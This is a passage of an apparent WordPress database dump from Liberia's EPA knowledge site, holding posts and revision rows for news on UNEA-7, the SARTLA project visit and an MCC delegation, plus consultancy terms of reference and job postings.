on UNEA-7 to chart a bold course that keeps warming within 1.5°C, reverses biodiversity loss, protects wetlands and coastlines, preserves glaciers, and tackles pollution in all forms. He urged member states to pair ambition with implementation finance, pressing donors and multilateral banks to simplify access to climate and nature funds, align lending with resilience goals, and scale support for adaptation. Partnerships with the private sector, he added, should include strong safeguards and local benefit-sharing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia placed intact tropical forests and frontline communities at the heart of global progress. The next phase of implementation, Dr. Yarkpawolo said, focuses on measurable outcomes: expanding protected and community-managed areas, upgrading forest monitoring and enforcement, and channeling climate finance directly to local stewards. Along the coast, where communities face sea-level rise and erosion, Liberia is prioritizing mangrove restoration and nature-based defenses alongside resilient infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On technology, the EPA chief backed responsible, ethical use of artificial intelligence to accelerate environmental monitoring, early-warning systems, conservation, and community empowerment—guarded by human values, equity, and sustainability. Liberia signaled support for UNEA-7 frameworks that promote beneficial AI while addressing privacy, bias, and access disparities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5685,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-11-at-18.01.24-768x1024.jpeg\" alt=\"\" class=\"wp-image-5685\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Inclusion was a central theme. Dr. Yarkpawolo urged the Assembly to embed the leadership of women and girls, persons with disabilities, local communities, Indigenous Peoples, youth, and children in decision-making, asserting that these groups are “essential to the solutions we seek.” He called for participatory monitoring, open environmental data, and accountability mechanisms to build trust and speed delivery.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delegates in Nairobi are considering resolutions spanning chemicals and waste, climate-health links, nature-positive economies, and AI governance. Liberia’s message echoed a growing consensus: integrated, justice-centered action is the only credible path to meeting 2030 goals. “The time for bold leadership is now,” Dr. Yarkpawolo concluded, reaffirming Liberia’s commitment to multilateralism and to working “hand-in-hand with all nations” for a safer, fairer, and more resilient future.</p>\n<!-- /wp:paragraph -->','Liberia calls for bold, inclusive global action at UNEA-7, spotlights forests, AI, and climate resilience','','inherit','closed','closed','','5683-revision-v1','','','2025-12-11 18:46:55','2025-12-11 18:46:55','',5683,'https://ekmsliberia.info/?p=5687',0,'revision','',0),(5688,38,'2025-12-11 18:58:00','2025-12-11 18:58:00','','Contractual Service-Inclusive Finance Specialist','','inherit','open','closed','','contractual-service-inclusive-finance-specialist-3','','','2025-12-11 18:58:00','2025-12-11 18:58:00','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5689,38,'2025-12-11 19:22:13','2025-12-11 19:22:13','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>','Contractual Service Inclusive Finance Specialist (National Consultant)','','inherit','closed','closed','','5682-revision-v1','','','2025-12-11 19:22:13','2025-12-11 19:22:13','',5682,'https://ekmsliberia.info/?p=5689',0,'revision','',0),(5690,38,'2025-12-11 19:25:15','2025-12-11 19:25:15','<strong>PROJECT BACKGROUND</strong>\n\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\n\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\n\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\n\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\n\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\n\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\n\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\n\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\n\n&nbsp;\n\n<strong>Objective of the Assignment</strong>\n\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\n\nSpecific objectives:\n<ul>\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\n 	<li>To align financial institution procedures with community needs and realities.</li>\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\n</ul>\n&nbsp;\n\nClick to:','Contractual Service Inclusive Finance Specialist (National Consultant)','','inherit','closed','closed','','5682-autosave-v1','','','2025-12-11 19:25:15','2025-12-11 19:25:15','',5682,'https://ekmsliberia.info/?p=5690',0,'revision','',0),(5691,38,'2025-12-11 19:25:29','2025-12-11 19:25:29','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service Inclusive Finance Specialist (National Consultant)','','inherit','closed','closed','','5682-revision-v1','','','2025-12-11 19:25:29','2025-12-11 19:25:29','',5682,'https://ekmsliberia.info/?p=5691',0,'revision','',0),(5692,38,'2026-01-06 11:59:49','2026-01-06 11:59:49','<strong>Background</strong>\r\n\r\nLiberia is a Party to the Convention on Biological Diversity (CBD) and the Nagoya Protocol on Access and Benefit-Sharing (ABS). In line with its international obligations, Liberia is required to prepare and submit its First National ABS Report through the ABS Clearing-House.\r\n\r\nThe Environmental Protection Agency (EPA), as the national ABS focal institution, seeks to engage a qualified consultant to support the coordination, data compilation, stakeholder consultations, and drafting of the national report in accordance with the CBD/ABS reporting framework.\r\n\r\n<strong>Objectives of the Consultancy</strong>\r\n\r\nOverall Objective\r\n<ul>\r\n 	<li>To support the Government of Liberia in the preparation, validation, and submission of its First National ABS Report in compliance with the Nagoya Protocol and ABS Clearing-House reporting requirements.</li>\r\n 	<li>Specific Objectives</li>\r\n 	<li>Compile and analyze national ABS-related legal, policy, institutional, and implementation data</li>\r\n 	<li>Facilitate inclusive stakeholder consultations at regional and national levels</li>\r\n 	<li>Draft a high-quality National ABS Report aligned with the CBD reporting template</li>\r\n 	<li>Support technical validation and finalization of the report for submission</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Draft-Terms-of-Reference-ABS-1ST-National-Report.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (ToR) Consultancy for the Preparation of Liberia’s First National Access and Benefit-Sharing (ABS) Report','','publish','closed','closed','','terms-of-reference-tor-consultancy-for-the-preparation-of-liberias-first-national-access-and-benefit-sharing-abs-report','','','2026-01-06 11:59:49','2026-01-06 11:59:49','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5692',29,'ekms_bulletin','',0),(5693,38,'2026-01-06 11:54:25','2026-01-06 11:54:25','<strong>Background</strong>\r\n\r\nLiberia is a Party to the Convention on Biological Diversity (CBD) and the Nagoya Protocol on Access and Benefit-Sharing (ABS). In line with its international obligations, Liberia is required to prepare and submit its First National ABS Report through the ABS Clearing-House.\r\n\r\nThe Environmental Protection Agency (EPA), as the national ABS focal institution, seeks to engage a qualified consultant to support the coordination, data compilation, stakeholder consultations, and drafting of the national report in accordance with the CBD/ABS reporting framework.\r\n\r\n<strong>Objectives of the Consultancy</strong>\r\n\r\nOverall Objective\r\n<ul>\r\n 	<li>To support the Government of Liberia in the preparation, validation, and submission of its First National ABS Report in compliance with the Nagoya Protocol and ABS Clearing-House reporting requirements.</li>\r\n 	<li>Specific Objectives</li>\r\n 	<li>Compile and analyze national ABS-related legal, policy, institutional, and implementation data</li>\r\n 	<li>Facilitate inclusive stakeholder consultations at regional and national levels</li>\r\n 	<li>Draft a high-quality National ABS Report aligned with the CBD reporting template</li>\r\n 	<li>Support technical validation and finalization of the report for submission</li>\r\n</ul>','Terms of Reference (ToR) Consultancy for the Preparation of Liberia’s First National Access and Benefit-Sharing (ABS) Report','','inherit','closed','closed','','5692-revision-v1','','','2026-01-06 11:54:25','2026-01-06 11:54:25','',5692,'https://ekmsliberia.info/?p=5693',0,'revision','',0),(5694,38,'2026-01-06 11:58:24','2026-01-06 11:58:24','','Draft Terms of Reference-ABS 1ST National Report','','inherit','open','closed','','draft-terms-of-reference-abs-1st-national-report','','','2026-01-06 11:58:24','2026-01-06 11:58:24','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/Draft-Terms-of-Reference-ABS-1ST-National-Report.pdf',0,'attachment','application/pdf',0),(5695,38,'2026-01-06 11:59:49','2026-01-06 11:59:49','<strong>Background</strong>\r\n\r\nLiberia is a Party to the Convention on Biological Diversity (CBD) and the Nagoya Protocol on Access and Benefit-Sharing (ABS). In line with its international obligations, Liberia is required to prepare and submit its First National ABS Report through the ABS Clearing-House.\r\n\r\nThe Environmental Protection Agency (EPA), as the national ABS focal institution, seeks to engage a qualified consultant to support the coordination, data compilation, stakeholder consultations, and drafting of the national report in accordance with the CBD/ABS reporting framework.\r\n\r\n<strong>Objectives of the Consultancy</strong>\r\n\r\nOverall Objective\r\n<ul>\r\n 	<li>To support the Government of Liberia in the preparation, validation, and submission of its First National ABS Report in compliance with the Nagoya Protocol and ABS Clearing-House reporting requirements.</li>\r\n 	<li>Specific Objectives</li>\r\n 	<li>Compile and analyze national ABS-related legal, policy, institutional, and implementation data</li>\r\n 	<li>Facilitate inclusive stakeholder consultations at regional and national levels</li>\r\n 	<li>Draft a high-quality National ABS Report aligned with the CBD reporting template</li>\r\n 	<li>Support technical validation and finalization of the report for submission</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Draft-Terms-of-Reference-ABS-1ST-National-Report.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (ToR) Consultancy for the Preparation of Liberia’s First National Access and Benefit-Sharing (ABS) Report','','inherit','closed','closed','','5692-revision-v1','','','2026-01-06 11:59:49','2026-01-06 11:59:49','',5692,'https://ekmsliberia.info/?p=5695',0,'revision','',0),(5696,38,'2026-01-07 22:22:37','2026-01-07 22:22:37','<!-- wp:paragraph -->\n<p>January 7, 2026- Grand Cape Mount County, Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director of the Environmental Protection Agency (EPA) of Liberia and Global Environment Facility (GEF) Operational Focal Point (OFP), Dr. Emmanuel K. Urey Yarkpawolo, has concluded a three-day oversight and stakeholder engagement visit to SARTLA project communities in Grand Cape Mount County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit was conducted under the GEF-8 Support to Operational Focal Points for Project Oversight, in partnership with the Tropical Biology Association (TBA), and forms part of Liberia’s OFP Workplan for early engagement on the Strengthening Agricultural Resilience through Transformational Livelihood Adaptation in Liberia (SARTLA) Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The 10-million-dollar SARTLA Project, approved by the Global Environment Facility (GEF) in May 2025, is a five-year initiative (2026–2030) being implemented through a strong inter-ministerial collaboration framework led by the EPA, with the Project Implementation Unit (PIU) hosted at the Ministry of Agriculture. Under this arrangement, the Ministry of Agriculture leads agriculture-related activities, MICAT supports communication and eco-tourism, the Ministry of Commerce and Industry drives private sector and MSME engagement, and NaFAA oversees fisheries and aquaculture interventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the visit, Dr. Yarkpawolo engaged county authorities, traditional leaders, women and youth groups, farmers, fisherfolk, and community-based organizations to gather first-hand information from communities on the impact of climate change and to explain the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The mission aimed to explain the SARTLA Project, confirm community participation arrangements, assess local climate vulnerabilities, and strengthen institutional oversight ahead of implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The SARTLA Project seeks to build climate resilience in natural-resource-dependent communities by restoring degraded ecosystems, strengthening climate-resilient agriculture and fisheries, improving access to climate finance, and promoting sustainable value chains and alternative livelihoods, including eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the OFP oversight mission, Dr. Yarkpawolo engaged directly with Collaborative Management Associations (CMAs), fisherfolk, farmers, women groups, youth representatives, and community-based organizations in Robertsport and surrounding SARTLA target communities. Members of the CMA shared experiences of seasonal flooding that forces families to temporarily abandon their homes when the sea and rivers converge. Fisherfolk and farmers expressed concern over declining yields and confusion caused by shifting weather patterns.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Community-based environmental groups, including Eco Brigade, also shared their efforts in sanitation, plastic waste reduction, and community clean-up campaigns, supported through training and small grants. Several women beneficiaries testified how small livelihood support has helped them expand fish and food businesses, improve household income, and strengthen resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5697,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/01/today2-1024x467.jpeg\" alt=\"\" class=\"wp-image-5697\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo commended the resilience and commitment of Grand Cape Mount communities and encouraged continued community participation and environmental stewardship. He emphasized that the SARTLA Project will concentrate on restoring degraded ecosystems, promoting climate-resilient agriculture and fisheries, enhancing sustainable value chains, and supporting alternative livelihoods, such as eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is already affecting how our people live and work. Through projects like SARTLA, we are working to ensure that communities have the tools, knowledge, and opportunities to adapt and thrive,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director also visited the coastal communities, observing their vulnerabilities, and committed to regular visits as the project progresses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit underscores EPA’s commitment to community-centered climate action, strong GEF project oversight, and evidence-based environmental governance, as Liberia continues to confront the realities of climate change.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Leads GEF OFP Oversight Visit to SARTLA Project Communities in Grand Cape Mount','','publish','open','open','','epa-executive-director-leads-gef-ofp-oversight-visit-to-sartla-project-communities-in-grand-cape-mount','','','2026-01-07 22:22:40','2026-01-07 22:22:40','',0,'https://ekmsliberia.info/?p=5696',33,'post','',0),(5697,38,'2026-01-07 22:21:41','2026-01-07 22:21:41','','today2','','inherit','open','closed','','today2','','','2026-01-07 22:21:41','2026-01-07 22:21:41','',5696,'https://ekmsliberia.info/wp-content/uploads/2026/01/today2.jpeg',0,'attachment','image/jpeg',0),(5698,38,'2026-01-07 22:22:20','2026-01-07 22:22:20','','Today Pic','','inherit','open','closed','','today-pic','','','2026-01-07 22:22:20','2026-01-07 22:22:20','',5696,'https://ekmsliberia.info/wp-content/uploads/2026/01/Today-Pic.jpeg',0,'attachment','image/jpeg',0),(5699,38,'2026-01-07 22:22:37','2026-01-07 22:22:37','<!-- wp:paragraph -->\n<p>January 7, 2026- Grand Cape Mount County, Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director of the Environmental Protection Agency (EPA) of Liberia and Global Environment Facility (GEF) Operational Focal Point (OFP), Dr. Emmanuel K. Urey Yarkpawolo, has concluded a three-day oversight and stakeholder engagement visit to SARTLA project communities in Grand Cape Mount County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit was conducted under the GEF-8 Support to Operational Focal Points for Project Oversight, in partnership with the Tropical Biology Association (TBA), and forms part of Liberia’s OFP Workplan for early engagement on the Strengthening Agricultural Resilience through Transformational Livelihood Adaptation in Liberia (SARTLA) Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The 10-million-dollar SARTLA Project, approved by the Global Environment Facility (GEF) in May 2025, is a five-year initiative (2026–2030) being implemented through a strong inter-ministerial collaboration framework led by the EPA, with the Project Implementation Unit (PIU) hosted at the Ministry of Agriculture. Under this arrangement, the Ministry of Agriculture leads agriculture-related activities, MICAT supports communication and eco-tourism, the Ministry of Commerce and Industry drives private sector and MSME engagement, and NaFAA oversees fisheries and aquaculture interventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the visit, Dr. Yarkpawolo engaged county authorities, traditional leaders, women and youth groups, farmers, fisherfolk, and community-based organizations to gather first-hand information from communities on the impact of climate change and to explain the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The mission aimed to explain the SARTLA Project, confirm community participation arrangements, assess local climate vulnerabilities, and strengthen institutional oversight ahead of implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The SARTLA Project seeks to build climate resilience in natural-resource-dependent communities by restoring degraded ecosystems, strengthening climate-resilient agriculture and fisheries, improving access to climate finance, and promoting sustainable value chains and alternative livelihoods, including eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the OFP oversight mission, Dr. Yarkpawolo engaged directly with Collaborative Management Associations (CMAs), fisherfolk, farmers, women groups, youth representatives, and community-based organizations in Robertsport and surrounding SARTLA target communities. Members of the CMA shared experiences of seasonal flooding that forces families to temporarily abandon their homes when the sea and rivers converge. Fisherfolk and farmers expressed concern over declining yields and confusion caused by shifting weather patterns.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Community-based environmental groups, including Eco Brigade, also shared their efforts in sanitation, plastic waste reduction, and community clean-up campaigns, supported through training and small grants. Several women beneficiaries testified how small livelihood support has helped them expand fish and food businesses, improve household income, and strengthen resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5697,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/01/today2-1024x467.jpeg\" alt=\"\" class=\"wp-image-5697\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo commended the resilience and commitment of Grand Cape Mount communities and encouraged continued community participation and environmental stewardship. He emphasized that the SARTLA Project will concentrate on restoring degraded ecosystems, promoting climate-resilient agriculture and fisheries, enhancing sustainable value chains, and supporting alternative livelihoods, such as eco-tourism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is already affecting how our people live and work. Through projects like SARTLA, we are working to ensure that communities have the tools, knowledge, and opportunities to adapt and thrive,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director also visited the coastal communities, observing their vulnerabilities, and committed to regular visits as the project progresses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit underscores EPA’s commitment to community-centered climate action, strong GEF project oversight, and evidence-based environmental governance, as Liberia continues to confront the realities of climate change.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Leads GEF OFP Oversight Visit to SARTLA Project Communities in Grand Cape Mount','','inherit','closed','closed','','5696-revision-v1','','','2026-01-07 22:22:37','2026-01-07 22:22:37','',5696,'https://ekmsliberia.info/?p=5699',0,'revision','',0),(5700,38,'2026-01-19 19:03:51','2026-01-19 19:03:51','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia today proudly hosted a delegation from the Millennium Challenge Corporation (MCC) and the Ministry of Finance and Development Planning (MFDP) at its headquarters in Mamba Point, Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting was attended by members of the MCC and MFDP teams, along with several senior management staff of the EPA. The engagement was presided over by the Acting Deputy Executive Director for Administration, Mr. Anthony Kollie.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit provided an opportunity for the MCC and MFDP officials to directly engage with EPA management on key environmental issues, particularly in relation to the recently secured MCC Compact for Liberia, which prioritizes strategic investments in energy generation, transmission, and distribution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the meeting, EPA officials briefed the delegation on environmental and social safeguards, compliance requirements, and policy alignment for MCC Compact-funded projects. Discussions highlighted the EPA’s regulatory role in ensuring that all energy projects comply with national laws, MCC Environmental and Social Performance Framework (ESPF) standards, and international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The briefing also covered the importance of early-stage environmental and social screening, mandatory Environmental and Social Impact Assessments (ESIAs), Environmental and Social Management Plans (ESMPs), and ongoing compliance monitoring throughout construction and operation phases.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA officials emphasized the role of gender considerations and social inclusion in project planning, ensuring that MCC-supported projects benefit women, children, and other vulnerable groups while promoting sustainable and equitable development. The delegation was advised on the EPA’s legal authority to issue permits, conduct inspections, enforce mitigation measures, and take corrective action for any non-compliance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MCC team expressed interest in understanding how Liberia applies safeguards to renewable energy solutions, such as solar and wind power, and how the EPA coordinates with other line ministries to integrate environmental protection, climate resilience, and gender considerations into national development projects.</p>\n<!-- /wp:paragraph -->','EPA Hosts MCC Delegation at Its Headquarters','','publish','open','open','','epa-hosts-mcc-delegation-at-its-headquarters','','','2026-01-19 19:03:53','2026-01-19 19:03:53','',0,'https://ekmsliberia.info/?p=5700',32,'post','',0),(5701,38,'2026-01-19 19:03:12','2026-01-19 19:03:12','','todat','','inherit','open','closed','','todat','','','2026-01-19 19:03:12','2026-01-19 19:03:12','',5700,'https://ekmsliberia.info/wp-content/uploads/2026/01/todat.jpeg',0,'attachment','image/jpeg',0),(5702,38,'2026-01-19 19:03:51','2026-01-19 19:03:51','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia today proudly hosted a delegation from the Millennium Challenge Corporation (MCC) and the Ministry of Finance and Development Planning (MFDP) at its headquarters in Mamba Point, Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting was attended by members of the MCC and MFDP teams, along with several senior management staff of the EPA. The engagement was presided over by the Acting Deputy Executive Director for Administration, Mr. Anthony Kollie.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit provided an opportunity for the MCC and MFDP officials to directly engage with EPA management on key environmental issues, particularly in relation to the recently secured MCC Compact for Liberia, which prioritizes strategic investments in energy generation, transmission, and distribution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the meeting, EPA officials briefed the delegation on environmental and social safeguards, compliance requirements, and policy alignment for MCC Compact-funded projects. Discussions highlighted the EPA’s regulatory role in ensuring that all energy projects comply with national laws, MCC Environmental and Social Performance Framework (ESPF) standards, and international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The briefing also covered the importance of early-stage environmental and social screening, mandatory Environmental and Social Impact Assessments (ESIAs), Environmental and Social Management Plans (ESMPs), and ongoing compliance monitoring throughout construction and operation phases.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA officials emphasized the role of gender considerations and social inclusion in project planning, ensuring that MCC-supported projects benefit women, children, and other vulnerable groups while promoting sustainable and equitable development. The delegation was advised on the EPA’s legal authority to issue permits, conduct inspections, enforce mitigation measures, and take corrective action for any non-compliance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MCC team expressed interest in understanding how Liberia applies safeguards to renewable energy solutions, such as solar and wind power, and how the EPA coordinates with other line ministries to integrate environmental protection, climate resilience, and gender considerations into national development projects.</p>\n<!-- /wp:paragraph -->','EPA Hosts MCC Delegation at Its Headquarters','','inherit','closed','closed','','5700-revision-v1','','','2026-01-19 19:03:51','2026-01-19 19:03:51','',5700,'https://ekmsliberia.info/?p=5702',0,'revision','',0),(5703,38,'2026-01-19 19:26:01','2026-01-19 19:26:01','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo provide administrative and research support to the legal team, ensuring efficient handling of legal matters and documentation.\r\n\r\n<strong>Key Responsibilities</strong>\r\n<ul>\r\n 	<li>Assist in drafting and reviewing contracts, agreements, and other legal documents.</li>\r\n 	<li>Conduct preliminary legal research and compile findings for review by the Legal Officer.</li>\r\n 	<li>Maintain organized case files and ensure proper documentation of legal correspondence.</li>\r\n 	<li>Support in preparing meeting notes, summaries, and reports for legal proceedings.</li>\r\n 	<li>Coordinate with internal departments to gather necessary information for legal matters.</li>\r\n 	<li>Provide logistical and administrative support for legal training sessions and workshops.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Assistant.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Legal Assistant','','publish','closed','closed','','legal-assistant','','','2026-01-19 19:26:13','2026-01-19 